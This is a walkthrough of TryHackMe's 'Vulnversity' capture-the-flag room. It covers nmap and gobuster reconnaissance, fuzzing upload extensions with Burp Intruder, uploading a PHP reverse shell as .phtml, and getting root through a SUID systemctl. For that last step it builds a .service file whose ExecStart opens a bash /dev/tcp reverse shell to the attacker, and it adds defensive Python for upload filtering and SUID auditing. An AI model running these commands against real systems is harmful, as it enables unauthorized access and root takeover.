Linux Privilege Escalation – Walkthrough

Hello there, welcome to our walkthrough of the “Vulnversity” room on TryHackMe. Here is the link to the room: https://tryhackme.com/room/vulnversity. For this room you can use the AttackBox, which is straightforward, or connect via OpenVPN; if you are not familiar with connecting over OpenVPN, please visit https://tryhackme.com/room/openvpn.

What is expected of the Room?

The room falls under the basic computer exploitation category on TryHackMe. It is meant to equip you with the skills needed for active reconnaissance, performing basic web application attacks and, most especially, privilege escalation.

[Task 1] Machine Deployment

We will use this machine to perform our attacks for the given tasks.

.  .  .

[Task 2] Reconnaissance

We need to gather information on the target machine, and what better place to begin than an Nmap scan of the specified box? (Your machine IP is the one provided by the room.)

(#1) Run an Nmap scan with the arguments given above and count the number of open ports.

Nmap – Service Discovery
nmap -sV -T4 <machine ip>
  • -sV: probe open ports to determine service and version information
  • -T4: timing template (4 = "aggressive", faster than the default)

(#2) Check the version of the Squid proxy running and submit your answer.

Squid Proxy Version
nmap -sV <machine ip>

(#3) Running Nmap with -p-400 simply tells it how many ports to scan. For more information on this, check the Nmap manual.

-p- Nmap tag
man nmap

(#4) We can use the same command as above (man nmap) to find out what the -n flag does not resolve.

-n Nmap tag

(#5) From the earlier Nmap scan we can simply identify the operating system, but we could also use the -O flag to detect the operating system running.

Operating system running

(#6) Make sure you know what web servers are and which ones are commonly used in order to answer this question. To get the port that the web server is running on, we can simply check the results of our first Nmap scan.

Web Server

[Task 3] Locating directories using Go Buster

Now we are going to use gobuster, a directory discovery tool that finds hidden directories. Gobuster is pre-installed in Kali, but in case it is not, you can install it with sudo apt-get install gobuster or sudo apt install gobuster, depending on your Kali version. On Kali, wordlists are normally located under the /usr/share/ folder.

Directory Listing

In order to find the directory containing the upload form page, we need to run the gobuster command listed below:

gobuster dir -u http://<machine IP>:3333 -w <wordlist path>

To confirm that we have the right directory, we can load the folder path in the browser; the result should look as follows:

Upload Form

. . .

[Task 4] Compromising Web Server

Now that we have found the upload form, we can move to the next task, which is to compromise the server.

(#1) We are required to test which file extensions can be uploaded (for example .txt, .HTML, .md, .php and others) to find the ones that cannot be uploaded. This is called fuzzing.

(#2) Create a list of the file extensions given in the room. This can be done in three easy steps:

extension file

  • touch <file_name> - creates the file
  • echo '<content>' > <file_name> - writes to the file
  • cat <file_name> - reads the file

We are going to use Burp Intruder to automate customized attacks. Go to the Proxy tab in Burp and make sure it is configured to intercept your browser traffic.

Intercept the form's traffic once you upload a file, right-click and send it to Intruder, click on Payloads, select Load, and choose the file in which you saved your extensions.

Set payload

Click the Positions tab, find the filename and “Add §” around the extension as seen below.

Adding the extension

Ensure that the attack type is Sniper and click Start attack.

Attack Type

(#1) Now that we know which extension our payload can use, we are going to create a reverse shell.

  • Download the PHP reverse shell here: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
  • Edit the downloaded file, i.e. set the IP to the one provided in the link given (your tun0 IP), and the port number if you wish. In this case, we will just use port 1234.
  • Rename the file to <file_name>.phtml
  • Listen for incoming connections using netcat with the command nc -lvnp <your_port>
  • Upload the shell and navigate to http://<ip>:3333/internal/uploads/<file_name>.phtml, which will execute your payload.
  • You should see a shell in your netcat session.
Start listener
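From the defender's side, what makes this upload form exploitable is a filter that blocks some PHP extensions but not others. The Python below is an added example, not code from the room or this post: it contrasts a constructed denylist of the kind that lets .phtml through with an allowlist check that only accepts expected upload types; both extension sets are assumptions.

```python
from pathlib import PurePosixPath

# Constructed denylist: blocks the obvious PHP extensions but forgets .phtml
# (the exact list used by the room's server is not known).
WEAK_DENYLIST = {".php", ".php3", ".php4", ".php5"}

# Assumed allowlist for a form that should only accept images and plain documents.
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}


def denylist_check(filename: str) -> bool:
    """Weak filter: accepts any file whose last extension is not on the denylist."""
    return PurePosixPath(filename).suffix not in WEAK_DENYLIST


def allowlist_check(filename: str) -> bool:
    """Hardened filter: a bare filename with exactly one extension, compared
    case-insensitively against the allowlist; everything else is rejected."""
    if "/" in filename or "\\" in filename or filename.startswith("."):
        return False                      # path components or hidden files
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False                      # no extension, or several extensions
    return "." + parts[1] in ALLOWLIST


def compare(candidates):
    """Run both checks over a list of names; returns {name: (weak, hardened)}."""
    return {c: (denylist_check(c), allowlist_check(c)) for c in candidates}


if __name__ == "__main__":
    # Constructed candidates: the extensions the walkthrough fuzzes plus .phtml.
    names = ["f.txt", "f.HTML", "f.md", "f.php", "f.phtml", "photo.PNG"]
    for name, (weak, hard) in compare(names).items():
        print(f"{name:10} weak={weak!s:5} hardened={hard}")
```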

(#2) To find out who manages the server, we will list all users.

List all users
cat /etc/passwd

(#3) In order to get the first flag, we need to go to the home directory of the user bill.

  • cd /home/bill - go to bill's folder
  • ls - list files and folders under the user
  • cat <file_name.txt> - read the file to get the flag
First flag

. . .

[Task 5] Privilege Escalation

Now that we have a shell as a low-privileged system user, we are going to escalate our privileges in order to become the root user.

SUID (set-user-ID) is a file permission bit that allows a user to run an executable with the permissions of the file's owner rather than their own.

(#1) We are expected to search for SUID files and see what stands out.

find / -perm /4000 2> /dev/null
SUID files

We notice /bin/systemctl, which is interesting not only because it manages services but also because, in this case, it is SUID and can therefore be run with elevated privileges by any user.
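From the defender's side, the same find command is the start of an audit: a SUID bit on systemctl is a misconfiguration that should be caught before anyone abuses it. The Python below is an added example, not from the room or this post; it enumerates SUID files the way find / -perm /4000 does and classifies them against a baseline. The baseline sets and the demo directory tree are constructed assumptions.

```python
import os
import stat
import tempfile

# Assumed baseline of binaries that are SUID on a typical install; build a
# real one from a known-good host. NEVER_SUID lists binaries that must not be
# SUID at all; systemctl is the one this room highlights.
EXPECTED_SUID = {"passwd", "sudo", "su", "mount", "umount", "chsh", "newgrp"}
NEVER_SUID = {"systemctl"}


def find_suid(root: str) -> list:
    """Regular files under root with the set-user-ID bit (like find / -perm /4000)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)           # lstat: a symlink is never a SUID file
            except OSError:
                continue                      # unreadable entry, keep going
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def audit_suid(paths, expected=EXPECTED_SUID, never=NEVER_SUID) -> dict:
    """Bucket SUID paths as dangerous (known primitive), expected, or unexpected."""
    report = {"dangerous": [], "expected": [], "unexpected": []}
    for p in paths:
        name = os.path.basename(p)
        key = "dangerous" if name in never else "expected" if name in expected else "unexpected"
        report[key].append(p)
    return report


def demo() -> dict:
    """Constructed fixture: temp bin/ with SUID systemctl, SUID passwd, plain ls."""
    with tempfile.TemporaryDirectory() as tmp:
        bindir = os.path.join(tmp, "bin")
        os.makedirs(bindir)
        for name, mode in (("systemctl", 0o4755), ("passwd", 0o4755), ("ls", 0o755)):
            path = os.path.join(bindir, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        report = audit_suid(find_suid(tmp))
    return {k: [os.path.basename(p) for p in v] for k, v in report.items()}


if __name__ == "__main__":  # on a real host: audit_suid(find_suid("/"))
    print(demo())
```

Anything in the "dangerous" or "unexpected" buckets is a finding to review; diffing the output against a stored baseline on a schedule turns this into a simple detection.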

(#2) To get the final flag, we need to escalate our privileges to become root. To do this, we are going to create a ‘.service’ file that, when run, gives us a shell as root.

  • First we need to create a file with the extension ‘.service’, e.g. file.service, and copy the following into it. This defines a service whose start command connects back to a port on our machine, giving us a reverse shell.
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<your_tun0_ip>/4455 0>&1'
  • Since we cannot copy this directly into our existing reverse shell, we need to host it from our local machine by simply using the python3 -m http.server <port_no> command.
Python server
  • We then download it from the existing shell. If we try this where we are presently, /home/bill, we get an error, so we need to cd /tmp and download it from there. This is because /tmp holds temporary files and is world-writable, so our user can write there.
Download .service file
wget http://<ip_add>:<port>/<file_name>.service
  • Once this succeeds, we have to enable the service before we can start it. Note: if we run systemctl enable <file_name>.service it gives an error, so we have to use the full path:
systemctl enable /tmp/<file_name>.service
Enable service
  • We now need to create a listener using the same port number that we used inside the ‘.service’ file.
Start Listener
  • Once the listener is up, we can then start the service.
systemctl start <file_name>.service
Start the service
  • This will create a reverse shell on our listener as shown below.
Reverse shell created

Woohoo!! We are now root; now we just need to find our second flag.

cd to the root user's home directory and list everything to see what is there. We need to read the root.txt file, and sure enough it is our second flag.

Second flag

. . .

What is hacking without having a bit of fun? Do you think we can change the password for the root user? There is only one way to find out: go ahead and try it.

Change Password

Hehe, that was relatively easy; now you try to change bill's password. We hope you learnt something new and had fun doing it. Until next time, adios!!
